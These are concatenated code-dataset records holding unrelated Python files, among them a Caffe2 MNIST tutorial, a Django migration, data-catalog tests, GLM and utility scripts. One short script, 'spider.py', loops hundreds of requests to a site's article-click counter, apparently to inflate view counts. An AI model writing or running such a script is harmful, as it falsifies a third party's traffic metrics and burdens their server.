False\n sys.exit(main(arguments))\n","sub_path":"tools/request_action.py","file_name":"request_action.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"358026029","text":"#!usr/bin/env python\n# _*_ coding:utf-8 _*_\n\n\"\"\"\n@author:chaowei\n@file: image_preprocessing_example.py\n@time: 2019/09/17\n\"\"\"\n\nfrom __future__ import print_function\nimport numpy as np\nimport os\nimport shutil\nimport caffe2.python.predictor.predictor_exporter as pe\n\nfrom caffe2.python import core, model_helper, net_drawer, workspace, brew\n\ncore.GlobalInit(['caffe2', '--caffe2_log_level=0'])\nprint(\"Necessities imported!\")\n\n\ndef DownloadResource(url, path):\n \"\"\"\n This section preps your image and test set in a lmdb database;\n Downloads resources from s3 by url and unzips them to the provided path\n :param url:\n :param path:\n :return:\n \"\"\"\n import requests, zipfile, StringIO\n print(\"Downloading...{} to {}\".format(url, path))\n r = requests.get(url, stream=True)\n z = zipfile.ZipFile(StringIO.StringIO(r.content))\n z.extractall(path)\n print(\"Completed download and extraction.\")\n\n\ncurrent_folder = os.path.join(os.path.expanduser('./data'), 'caffe2_notebooks')\ndata_folder = os.path.join(current_folder, 'tutorial_data', 'mnist')\nroot_folder = os.path.join(current_folder, 'tutorial_files', 'tutorial_mnist')\ndb_missing = False\n\nif not os.path.exists(data_folder):\n os.makedirs(data_folder)\n print(\"Your data folder was not found!! This was generated: {}\".format(data_folder))\n\n# Look for existing database: lmdb\nif os.path.exists(os.path.join(data_folder,\"mnist-train-nchw-lmdb\")):\n print(\"lmdb train db found!\")\nelse:\n db_missing = True\n\nif os.path.exists(os.path.join(data_folder,\"mnist-test-nchw-lmdb\")):\n print(\"lmdb test db found!\")\nelse:\n db_missing = True\n\n# attempt the download of the db if either was missing\nif db_missing:\n print(\"one or both of the MNIST lmbd dbs not found!!\")\n db_url = \"http://download.caffe2.ai/databases/mnist-lmdb.zip\"\n try:\n DownloadResource(db_url, data_folder)\n except Exception as ex:\n print(\"Failed to download dataset. Please download it manually from {}\".format(db_url))\n print(\"Unzip it and place the two database folders here: {}\".format(data_folder))\n raise ex # 触发异常后面的代码不会再执行\nif os.path.exists(root_folder):\n print(\"Looks like you ran this before, so we need to cleanup those old files...\")\n shutil.rmtree(root_folder) # 递归删除一个目录以及目录内的所有内容\n\nos.makedirs(root_folder)\nworkspace.ResetWorkspace(root_folder)\n\nprint(\"training data folder:\" + data_folder)\nprint(\"workspace root folder:\" + root_folder)\n\n\ndef AddInput(model, batch_size, db, db_type):\n # load the data\n data_uint8, label = model.TensorProtosDBInput(\n [], [\"data_uint8\", \"label\"], batch_size=batch_size,\n db=db, db_type=db_type)\n # cast the data to float\n data = model.Cast(data_uint8, \"data\", to=core.DataType.FLOAT)\n # scale data from [0,255] down to [0,1]\n data = model.Scale(data, data, scale=float(1./256))\n # don't need the gradient for the backward pass\n data = model.StopGradient(data, data)\n return data, label\n\n\ndef AddLeNetModel(model, data):\n '''\n This part is the standard LeNet model: from data to the softmax prediction.\n\n For each convolutional layer we specify dim_in - number of input channels\n and dim_out - number or output channels. Also each Conv and MaxPool layer changes the\n image size. For example, kernel of size 5 reduces each side of an image by 4.\n\n While when we have kernel and stride sizes equal 2 in a MaxPool layer, it divides\n each side in half.\n '''\n # Image size: 28 x 28 -> 24 x 24\n conv1 = brew.conv(model, data, 'conv1', dim_in=1, dim_out=20, kernel=5) # stride =1 ?\n # Image size: 24 x 24 -> 12 x 12\n pool1 = brew.max_pool(model, conv1, 'pool1', kernel=2, stride=2)\n # Image size: 12 x 12 -> 8 x 8\n conv2 = brew.conv(model, pool1, 'conv2', dim_in=20, dim_out=100, kernel=5)\n # Image size: 8 x 8 -> 4 x 4\n pool2 = brew.max_pool(model, conv2, 'pool2', kernel=2, stride=2)\n # 50 * 4 * 4 stands for dim_out from previous layer multiplied by the image size\n fc3 = brew.fc(model, pool2, 'fc3', dim_in=100 * 4 * 4, dim_out=500)\n\n # fc3 = brew.relu(model, fc3, fc3)\n relu = brew.relu(model, fc3, fc3)\n pred = brew.fc(model, relu, 'pred', 500, 10)\n softmax = brew.softmax(model, pred, 'softmax')\n return softmax\n\n\ndef AddAccuracy(model, softmax, label):\n \"\"\"Adds an accuracy op to the model\"\"\"\n accuracy = brew.accuracy(model, [softmax, label], \"accuracy\")\n return accuracy\n\nxent = model.LabelCrossEntropy([softmax, label], 'xent')\n\n\n\n\n\nif __name__ == '__main__':\n\n\n pass","sub_path":"normalTest/image_preprocessing_example.py","file_name":"image_preprocessing_example.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"187434768","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0006_remove_toon__damage'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Weapon',\n fields=[\n ('name', models.CharField(max_length=30, serialize=False, primary_key=True)),\n ('num_dice', models.IntegerField(default=1)),\n ('dice_sides', models.IntegerField(default=3)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='toon',\n name='id',\n ),\n migrations.AlterField(\n model_name='toon',\n name='name',\n field=models.CharField(max_length=30, serialize=False, primary_key=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"api/migrations/0007_auto_20141106_1506.py","file_name":"0007_auto_20141106_1506.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"553528768","text":"import datetime\n\nimport pytest\nfrom dbcat.catalog.models import ColumnLineage, Job, JobExecution, JobExecutionStatus\n\n\ndef test_get_sources(rest_catalog):\n sources = list(rest_catalog.get_sources())\n assert len(sources) == 1\n source = sources[0]\n assert source.name == \"test\"\n assert source.id is not None\n\n\ndef test_get_schemata(rest_catalog):\n schemata = list(rest_catalog.get_schemata())\n assert len(schemata) == 1\n assert schemata[0].name == \"default\"\n assert schemata[0].id is not None\n\n\ndef test_get_tables(rest_catalog):\n num = 0\n for table in rest_catalog.get_tables():\n assert table.id is not None\n assert table.name is not None\n num += 1\n assert num == 8\n\n\ndef test_get_columns(rest_catalog):\n num = 0\n for column in rest_catalog.get_columns():\n assert column.id is not None\n assert column.name is not None\n assert column.data_type is not None\n assert column.sort_order is not None\n num += 1\n\n assert num == 32\n\n\ndef test_get_source_by_id(rest_catalog):\n source = rest_catalog.get_source_by_id(1)\n assert source.name == \"test\"\n assert source.fqdn == \"test\"\n assert source.source_type == \"json\"\n\n\ndef test_get_schema_by_id(rest_catalog):\n schema = rest_catalog.get_schema_by_id(1)\n assert schema.name == \"default\"\n assert schema.fqdn == [\"test\", \"default\"]\n\n\ndef test_get_table_by_id(rest_catalog):\n table = rest_catalog.get_table_by_id(1)\n assert table.name == \"pagecounts\"\n assert table.fqdn == [\"test\", \"default\", \"pagecounts\"]\n\n\ndef test_get_column_by_id(rest_catalog):\n column = rest_catalog.get_column_by_id(1)\n assert column.name == \"group\"\n assert column.fqdn == [\"test\", \"default\", \"pagecounts\", \"group\"]\n\n\ndef test_get_source_by_name(rest_catalog):\n sources = list(rest_catalog.get_source_by_name(\"test\"))\n assert len(sources) == 1\n source = sources[0]\n assert source.name == \"test\"\n assert source.id is not None\n\n\ndef test_get_schema_by_name(rest_catalog):\n schemata = list(rest_catalog.get_schema_by_name(\"default\"))\n assert len(schemata) == 1\n assert schemata[0].name == \"default\"\n assert schemata[0].id is not None\n\n\ndef test_get_table_by_name(rest_catalog):\n num = 0\n for table in rest_catalog.get_table_by_name(\"normalized_pagecounts\"):\n assert table.id is not None\n assert table.name == \"normalized_pagecounts\"\n num += 1\n assert num == 1\n\n\ndef test_get_column_by_name(rest_catalog):\n num = 0\n for column in rest_catalog.get_column_by_name(\"bytes_sent\"):\n assert column.id is not None\n assert column.name is not None\n # assert column.type is not None\n assert column.sort_order is not None\n num += 1\n\n assert num == 2\n\n\ndef test_add_source_pg(rest_catalog):\n data = {\n \"name\": \"pg\",\n \"source_type\": \"postgres\",\n \"database\": \"db_database\",\n \"username\": \"db_user\",\n \"password\": \"db_password\",\n \"port\": \"db_port\",\n \"uri\": \"db_uri\",\n }\n\n pg_connection = rest_catalog.add_source(**data)\n assert pg_connection.name == \"pg\"\n assert pg_connection.source_type == \"postgres\"\n assert pg_connection.database == \"db_database\"\n assert pg_connection.username == \"db_user\"\n assert pg_connection.password == \"db_password\"\n assert pg_connection.port == \"db_port\"\n assert pg_connection.uri == \"db_uri\"\n\n\ndef test_add_source_mysql(rest_catalog):\n data = {\n \"name\": \"mys\",\n \"source_type\": \"mysql\",\n \"database\": \"db_database\",\n \"username\": \"db_user\",\n \"password\": \"db_password\",\n \"port\": \"db_port\",\n \"uri\": \"db_uri\",\n }\n\n mysql_conn = rest_catalog.add_source(**data)\n\n assert mysql_conn.name == \"mys\"\n assert mysql_conn.source_type == \"mysql\"\n assert mysql_conn.database == \"db_database\"\n assert mysql_conn.username == \"db_user\"\n assert mysql_conn.password == \"db_password\"\n assert mysql_conn.port == \"db_port\"\n assert mysql_conn.uri == \"db_uri\"\n\n\ndef test_add_source_bq(rest_catalog):\n bq_conn = rest_catalog.add_source(\n name=\"bq\",\n source_type=\"bigquery\",\n key_path=\"db_key_path\",\n project_credentials=\"db_creds\",\n project_id=\"db_project_id\",\n )\n assert bq_conn.name == \"bq\"\n assert bq_conn.source_type == \"bigquery\"\n assert bq_conn.key_path == \"db_key_path\"\n assert bq_conn.project_credentials == \"db_creds\"\n assert bq_conn.project_id == \"db_project_id\"\n\n\ndef test_add_source_glue(rest_catalog):\n glue_conn = rest_catalog.add_source(name=\"gl\", source_type=\"glue\")\n assert glue_conn.name == \"gl\"\n assert glue_conn.source_type == \"glue\"\n\n\ndef test_add_source_snowflake(rest_catalog):\n sf_conn = rest_catalog.add_source(\n name=\"sf\",\n source_type=\"snowflake\",\n database=\"db_database\",\n username=\"db_user\",\n password=\"db_password\",\n account=\"db_account\",\n role=\"db_role\",\n warehouse=\"db_warehouse\",\n )\n assert sf_conn.name == \"sf\"\n assert sf_conn.source_type == \"snowflake\"\n assert sf_conn.database == \"db_database\"\n assert sf_conn.username == \"db_user\"\n assert sf_conn.password == \"db_password\"\n assert sf_conn.account == \"db_account\"\n assert sf_conn.role == \"db_role\"\n assert sf_conn.warehouse == \"db_warehouse\"\n\n\ndef load_edges(catalog, expected_edges, job_execution_id):\n column_edge_ids = []\n for edge in expected_edges:\n source = catalog.get_column(\n database_name=edge[0][0],\n schema_name=edge[0][1],\n table_name=edge[0][2],\n column_name=edge[0][3],\n )\n\n target = catalog.get_column(\n database_name=edge[1][0],\n schema_name=edge[1][1],\n table_name=edge[1][2],\n column_name=edge[1][3],\n )\n\n added_edge = catalog.add_column_lineage(source, target, job_execution_id, {})\n\n column_edge_ids.append(added_edge.id)\n return column_edge_ids\n\n\n@pytest.fixture(scope=\"module\")\ndef load_page_lookup_nonredirect_edges(save_catalog):\n catalog = save_catalog\n\n expected_edges = [\n (\n (\"test\", \"default\", \"page\", \"page_id\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"redirect_id\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_id\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"page_id\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_title\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"redirect_title\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_title\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"true_title\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_latest\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"page_version\"),\n ),\n ]\n\n job = catalog.add_job(\n \"insert_page_lookup_nonredirect\",\n {\"sql\": \"insert into page_lookup_nonredirect select from page\"},\n )\n e1 = catalog.add_job_execution(\n job=job,\n started_at=datetime.datetime.combine(\n datetime.date(2021, 4, 1), datetime.time(1, 0)\n ),\n ended_at=datetime.datetime.combine(\n datetime.date(2021, 4, 1), datetime.time(1, 15)\n ),\n status=JobExecutionStatus.SUCCESS,\n )\n\n executions = [e1.id]\n name = job.name\n\n print(\"Inserted job {}\".format(name))\n print(\"Inserted executions {}\".format(\",\".join(str(v) for v in executions)))\n\n column_edge_ids = load_edges(catalog, expected_edges, executions[0])\n print(\"Inserted edges {}\".format(\",\".join(str(v) for v in column_edge_ids)))\n\n yield catalog, job, expected_edges\n\n session = catalog.scoped_session\n session.query(ColumnLineage).filter(ColumnLineage.id.in_(column_edge_ids)).delete(\n synchronize_session=False\n )\n print(\"DELETED edges {}\".format(\",\".join(str(v) for v in column_edge_ids)))\n session.commit()\n\n session.query(JobExecution).filter(JobExecution.id.in_(executions)).delete(\n synchronize_session=False\n )\n print(\"DELETED executions {}\".format(\",\".join(str(v) for v in executions)))\n session.commit()\n\n session.query(Job).filter(Job.name == name).delete(synchronize_session=False)\n print(\"DELETED job {}\".format(name))\n session.commit()\n\n\ndef test_api_main(graph_sdk, load_page_lookup_nonredirect_edges):\n catalog, job, expected_edges = load_page_lookup_nonredirect_edges\n graph = graph_sdk.get([job.id])\n assert len(graph[\"edges\"]) == 10\n assert len(graph[\"nodes\"]) == 15\n\n\ndef test_parser(rest_catalog, parser_sdk, graph_sdk, save_catalog):\n data = {\n \"name\": \"LOAD page_lookup\",\n \"query\": \"INSERT INTO page_lookup SELECT plr.redirect_id, plr.redirect_title, plr.true_title, plr.page_id, \"\n \"plr.page_version FROM page_lookup_redirect plr\",\n }\n\n job_execution = parser_sdk.parse(**data)\n assert job_execution is not None\n\n graph = graph_sdk.get([job_execution.job_id])\n\n assert len(graph[\"edges\"]) == 10\n assert len(graph[\"nodes\"]) == 15\n\n column_lineages = rest_catalog.get_column_lineage([job_execution.job_id])\n assert (len(column_lineages)) == 10\n","sub_path":"test/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"425028471","text":"import torch\nimport numpy as np\n\nfor subset in ['train', 'val', 'test']:\n print('Processing '+subset)\n prefix = '/remote/bones/user/public/vbalacha/bart_cnndm_preprocessing/cnn-dailymail/cnn_dm_test/' + subset+'.source-target.'\n sent_id_dataset = []\n sent_sizes = []\n with open(prefix + 'source.sentids', 'r', encoding='utf-8') as f:\n print(prefix + 'source.sentids')\n count = 0\n for line in f:\n if count % 1000 == 0:\n print('Processed '+str(count)+' examples')\n data = line.strip('\\n').split(\" \")\n data = list(map(int, data))\n data.append(data[-1])\n no_sents = data[-1]+1\n no_words = len(data)\n data = torch.LongTensor(data)\n one_hot_data = np.zeros((no_sents, no_words))\n for id in range(no_sents):\n one_hot_data[id, data.eq(id)] = 1\n sent_id_dataset.append(torch.from_numpy(one_hot_data))\n sent_sizes.append(no_words)\n save_obj = {'sent_id_dataset': sent_id_dataset, 'sent_sizes': sent_sizes}\n save_filename = prefix + 'source.sentids.pt'\n print('Saving to : '+save_filename)\n torch.save(save_obj, save_filename)\n","sub_path":"examples/structsum/preprocess_sentids.py","file_name":"preprocess_sentids.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"318797588","text":"\n\n#calss header\nclass _BICYCLING():\n\tdef __init__(self,): \n\t\tself.name = \"BICYCLING\"\n\t\tself.definitions = [u'riding a bicycle or relating to riding bicycles: ', u'used to refer to a royal family with an informal personal style, especially the royal family of the Netherlands or Sweden : ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_bicycling.py","file_name":"_bicycling.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"216319915","text":"from venezia.network.entry import NodeEntry\n\nentry = NodeEntry(\n\tip = '',\n\tport = 1052,\n\tip_index = '',\n\tip_backup = '',\n\tdirectory_key_private = '',\n\tdirectory_key_public = ''\n\t)\nentry.settup()\n\nwhile True:\n\t\n\t\tsleep(0.01) #stop the cpu from constantly running at 100% cpu\n\t\t#keep the program running to test the listener\n","sub_path":"docs/examples/test_entry.py","file_name":"test_entry.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"255391196","text":"from threading import Thread\nimport pika\n\nfrom krk_meetings.exchanges import Exchange\nfrom krk_meetings.rabbitmq.RmqHelper import RmqHelper\n\n\nclass RmqProducer(RmqHelper):\n def __init__(self, exchange: Exchange):\n super().__init__(exchange)\n self.heartbeat_thread = self.data_consumer_thread = Thread(target=self.set_heartbeat_scheduler, args=[])\n if self.exchange.type:\n self.channel.exchange_declare(exchange=self.exchange.name, exchange_type=self.exchange.type)\n else:\n self.channel.exchange_declare(exchange=self.exchange.name)\n\n def start(self):\n self.heartbeat_thread.start()\n\n\n","sub_path":"backend/krk_meetings/rabbitmq/RmqProducer.py","file_name":"RmqProducer.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"162575502","text":"\nfrom PyQt4 import QtCore, QtGui\n\n\nclass MyDoubleSpinBox(QtGui.QDoubleSpinBox):\n '''\n A custom QDoubleSpinBox that adds a custom signal to send its value\n only when editing is finished\n '''\n editingValueFinished = QtCore.pyqtSignal(float) # emitted by the modified doublespinbox\n\n def __init__(self, parent = None):\n super(MyDoubleSpinBox, self).__init__(parent)\n self.editingFinished.connect( self.__handleEditingFinished)\n self.valueChanged.connect(self.__handleValueChanged)\n self.__before = 0\n\n def __handleValueChanged(self, aValue):\n if not self.hasFocus():\n self.__before = aValue\n\n def __handleEditingFinished(self):\n\n before, after = self.__before, self.value()\n if before != after:\n self.__before = after\n self.editingValueFinished.emit(after)\n","sub_path":"HyperCal/GUIInspector/MyDoubleSpinBox.py","file_name":"MyDoubleSpinBox.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"6904384","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Test the Generalized Linear Model \n# Reference: https://qiita.com/ground0state/items/38123b70c152253befe4\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\n# Load data\nboston = load_boston()\ndf = pd.DataFrame(boston.data, columns=boston.feature_names)\ndf['PRICE'] = boston.target\ndisplay(df.head(10))\n\n# Split data\nX = df.drop('PRICE', axis=1)\ny = df['PRICE']\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size =0.8)\n\n# Create train data\ndata = pd.concat([X_train, y_train], axis=1)\n\n# Create linear predictor\nformula = \"PRICE ~ 1 + INDUS + CHAS + RM + RAD\"\n\n# Chose link function\nlink = sm.genmod.families.links.log\n\n# Chose distribution\nfamily = sm.families.Poisson(link=link)\n\n# Fit model\nmodel = smf.glm(formula=formula, data=data, family=family )\nresult = model.fit() \ndisplay(result.summary())\n\n# Evaluate AIC\nprint(result.aic)\n\n# Predict\ny_pred = result.predict(X_test)\ndf_test = pd.concat([X_test, y_test.rename(\"ACTUAL\"), y_pred.rename(\"PREDICT\")], axis=1).reset_index(drop = True)\ndisplay(df_test.head(10))\n\n# Caluclate Accuracy\ndf_test[\"AE\"] = np.abs(df_test[\"ACTUAL\"] - df_test[\"PREDICT\"])\ndisplay(df_test[\"AE\"].mean())\n\n# Another model (Use all valiables)\n# Or use follow code\nX_train.const = sm.add_constant(X_train)\nmodel2 = sm.GLM(y_train, X_train.const, family=sm.families.Poisson())\nresult2 = model2.fit() \ndisplay(result2.summary())\n\n# Evaluate AIC\nresult2.aic\n\n# Predict\nX_test.const = sm.add_constant(X_test)\ny_pred2 = result2.predict(X_test.const)\ndf_test2 = pd.concat([X_test, y_test.rename(\"ACTUAL\"), y_pred2.rename(\"PREDICT\")], axis=1).reset_index(drop = True)\ndisplay(df_test2.head(10))\n\n# Caluclate Accuracy\ndf_test2[\"AE\"] = np.abs(df_test2[\"ACTUAL\"] - df_test2[\"PREDICT\"])\ndisplay(df_test2[\"AE\"].mean())\n\n\n\n","sub_path":"GLM.py","file_name":"GLM.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"106720409","text":"# -*- coding: utf-8 -*-\nimport nysol._nysolshell_core as n_core\nfrom nysol.mcmd.nysollib.core import NysolMOD_CORE\nfrom nysol.mcmd.nysollib import nysolutil as nutil\n\nclass Nysol_List2Csv(NysolMOD_CORE):\n\n\t_kwd = [[\"i\",\"o\",\"header\"],[]]\n\t_inkwd = [\"i\"] \n\t_outkwd = [\"o\"]\n\n\tdef __init__(self,*args, **kw_args) :\n\n\t\tif len(args) != 1 :\n\t\t\tprint(\"arge only one\")\n\t\t\treturn None\n\n\t\tif isinstance(args[0],list) :\n\t\t\tkw_args[\"i\"] = args[0]\n\t\telse :\n\t\t\tprint(\"unsuport type\")\n\t\t\treturn None\n\t\t\t\n\t\tif not isinstance(kw_args[\"i\"],list) :\n\t\t\tprint(\"unsuport type\")\n\t\t\treturn None\n\n\t\t# headerがあればmcut \t\t\n\t\tif \"header\" in kw_args :\n\n\t\t\tif isinstance(kw_args[\"header\"],list) :\n\t\t\t\tfld =[]\n\t\t\t\tfor i,v in enumerate(kw_args[\"header\"]):\n\t\t\t\t\tfld.append(\"%d:%s\"%(i,v))\n\t\t\t\t\n\t\t\t\tkw_args[\"f\"] = fld\n\t\n\t\t\telif isinstance(kw_args[\"header\"],str) :\n\t\t\t\thd = re.split(r\",\", kw_args[\"header\"])\n\t\t\t\tfor i,v in enumerate(hd):\n\t\t\t\t\tfld.append(\"%d:%s\"%(i,v))\n\t\t\telse :\n\t\t\t\tprint(\"unsuport type\")\n\t\t\t\treturn None\n\n\t\t\tkw_args[\"nfni\"] = True\n\t\t\tdel kw_args[\"header\"]\n\t\t\tsuper(Nysol_List2Csv,self).__init__(\"mcut\",kw_args)\n\n\t\telse:\n\t\t\tkw_args[\"f\"] = \"*\"\t\t\n\t\t\tsuper(Nysol_List2Csv,self).__init__(\"mcut\",kw_args)\n\n","sub_path":"nysol/mcmd/submod/list2csv.py","file_name":"list2csv.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"257856063","text":"#encoding:utf-8\nimport requests\nimport time\n\npath = 'http://demo.ltpower.net/web/wgjj-e05dbfcfdd9fadc366275dd7633d426e/tools/submit_ajax.ashx?action=view_article_click&id='\n\ncount = 4299\nfor k in range(1,200):\n while count != 4272:\n res = requests.get(path+str(count))\n print(res.text)\n print('id:%d 访问第:%d'%(count,k));\n time.sleep(2);\n count -= 1\n count = 4299\n\nprint('done');","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"3131265","text":"# Copyright 2012, Sean B. Palmer\n# Code at http://inamidst.com/duxlot/\n# Apache License 2.0\n\nimport json\nimport os\n\n# Save PEP 3122!\nif \".\" in __name__:\n from . import storage\nelse:\n import storage\n\ndef aliases_create():\n import sys\n if not directory.exists():\n directory.create()\n\n aliases.write({})\n\n print(\"Created duxlot configuration aliases file:\", file=sys.stderr)\n print(\"\", file=sys.stderr)\n print(\" \" + aliases.path, file=sys.stderr)\n print(\"\", file=sys.stderr)\n\ndef aliases_exists(alias=None):\n if alias is not None:\n data = aliases.read()\n return alias in data\n\n if os.path.isfile(aliases.path):\n return True\n\n if os.path.exists(aliases.path):\n fail(error.ALIASES_NON_REGULAR)\n\n return False\n\ndef aliases_get(alias):\n data = aliases.read()\n return data.get(alias)\n\ndef aliases_put(alias, value):\n data = aliases.read()\n data[alias] = value\n aliases.write(data)\n return True\n\ndef aliases_read():\n # @@\n try: f = open(aliases.path, encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.ALIASES_UNREADABLE)\n\n with f:\n try: data = json.load(f)\n except ValueError:\n fail(error.ALIASES_NOT_JSON)\n except UnicodeDecodeError:\n fail(error.ALIASES_NOT_UTF8)\n\n return data\n\ndef aliases_remove(alias):\n data = aliases_read()\n del data[alias]\n aliases_write(data)\n\ndef aliases_write(data):\n # @@\n try: f = open(aliases.path, \"w\", encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.ALIASES_UNWRITEABLE)\n\n with f:\n try: json.dump(data, f)\n except (OSError, IOError):\n fail(error.ALIASES_UNWRITEABLE)\n\ndef path(name):\n name = os.path.expanduser(name)\n return os.path.abspath(name)\n\naliases = storage.FrozenStorage({\n \"create\": aliases_create,\n \"exists\": aliases_exists,\n \"get\": aliases_get,\n \"path\": path(\"~/.duxlot/aliases.json\"),\n \"put\": aliases_put,\n \"read\": aliases_read,\n \"remove\": aliases_remove,\n \"write\": aliases_write\n})\n\ndef base(path):\n if path.endswith(\".json\"):\n # Remove \".json\" extension\n path = path[:-5]\n\n if not os.path.basename(path):\n fail(error.BASE_UNUSABLE % reduceuser(path))\n\n return path\n\ndef create():\n \"Create a default minimal config\"\n import sys\n if not directory.exists():\n directory.create()\n\n data = minimal()\n write(default, data, pretty=True)\n\n print(\"Created duxlot default configuration file:\", file=sys.stderr)\n print(\"\", file=sys.stderr)\n print(\" \" + default, file=sys.stderr)\n print(\"\", file=sys.stderr)\n\ndef directory_create():\n # if directory.exists():\n # raise Exception(\"Directory already exists\")\n import sys\n\n try: os.mkdir(directory.path)\n except (OSError, IOError):\n fail(error.DIRECTORY_UNWRITEABLE)\n\n print(\"Created default duxlot configuration directory:\", file=sys.stderr)\n print(\"\", file=sys.stderr)\n print(\" \" + directory.path, file=sys.stderr)\n print(\"\", file=sys.stderr)\n\n return True\n\ndef directory_exists():\n if os.path.isdir(directory.path):\n return True\n\n if os.path.exists(directory.path):\n fail(error.DIRECTORY_NON_DIRECTORY)\n\n return False\n\ndirectory = storage.FrozenStorage({\n \"create\": directory_create,\n \"exists\": directory_exists,\n \"path\": path(\"~/.duxlot\") # @@ DUXLOT_DIRECTORY\n})\n\ndefault = os.path.join(directory.path, \"duxlot.json\")\n\ndef reduceuser(path):\n home = os.path.expanduser(\"~/\")\n if path.startswith(home):\n path = \"~/\" + path[len(home):]\n return path\n\nerror = storage.FrozenStorage({\n \"ALIASES_NON_REGULAR\": ##########\n\"\"\"\nThe following path exists, but is not a regular file as it ought to be:\n\n %s\n\nThis is a very strange error, so you're on your own debugging this one. Check\nto make sure you didn't accidentally create a directory there. Otherwise,\nplease file a bug.\n\n(Error Name: ALIASES_NON_REGULAR)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_NOT_CONFIG\": ##########\n\"\"\"\nYou are trying to use your aliases file as a config file. The aliases file for\nduxlot is a JSON file, but it's not where configuration options for a duxlot\ninstance are stored.\n\nThis was most likely caused by a typo or through misunderstanding the duxlot\nscript options. If you require further help, please read the duxlot\ndocumentation in more detail, or contact the maintainer for further information.\n\n(Error Name: ALIASES_NOT_CONFIG)\n\"\"\",\n\n \"ALIASES_NOT_JSON\": ##########\n\"\"\"\nYour aliases file exists but is not valid JSON:\n\n %s\n\nThis is probably caused by one of two reasons:\n\n1. The file has been created as normal by duxlot, but at some point has been\nedited manually and incorrectly. In this case, you may want to use a JSON\nvalidator to see what has gone wrong, or even remove the file if it does not\ncontain valuable aliases and start again. JSON should be fairly easy to repair.\n\n2. A random file has been created there for no apparent reason. This could be\ndue to a script malfunction or something of this nature. Check to see what the\ncontents of the file are, and if the file isn't important, move it to another\nlocation.\n\n(Error Name: ALIASES_NOT_JSON)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_NOT_UTF8\": ##########\n\"\"\"\nYour aliases.json file is not correctly encoded as utf-8:\n\n %s\n\nThis error may be difficult to fix. It was probably caused by one of the two\nfollowing reasons:\n\n1. You manually edited the file and didn't save it with the correct encoding.\n\n2. A tool at some point, possibly the term you used as an interface to duxlot,\ndidn't send valid utf-8 and for some reason it got through to the aliases.json\nfile.\n\nYou can either try to fix the encoding, which might incur the difficult task of\nsweeping up mojibake, or you might want to take the easy option and just move\nor even delete the file.\n\nLearn more about utf-8 and mojibake here:\n\nhttps://en.wikipedia.org/wiki/UTF-8\nhttps://en.wikipedia.org/wiki/Mojibake\n\n(Error Name: ALIASES_NOT_UTF8)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_UNREADABLE\": ##########\n\"\"\"\nYour aliases file cannot be read:\n\n %s\n\nThere is a file there, but duxlot is unable to access it. There is probably a\npermissions error with either the file itself, or one of its parent\ndirectories. Check to make sure that the user duxlot is running as has access\nto that file.\n\n(Error Name: ALIASES_UNREADABLE)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_UNWRITEABLE\": ##########\n\"\"\"\nYour aliases file cannot be written to:\n\n %s\n\nThere is a file there, but duxlot is unable to access it. There is probably a\npermissions error with either the file itself, or one of its parent\ndirectories. Check to make sure that the user duxlot is running as 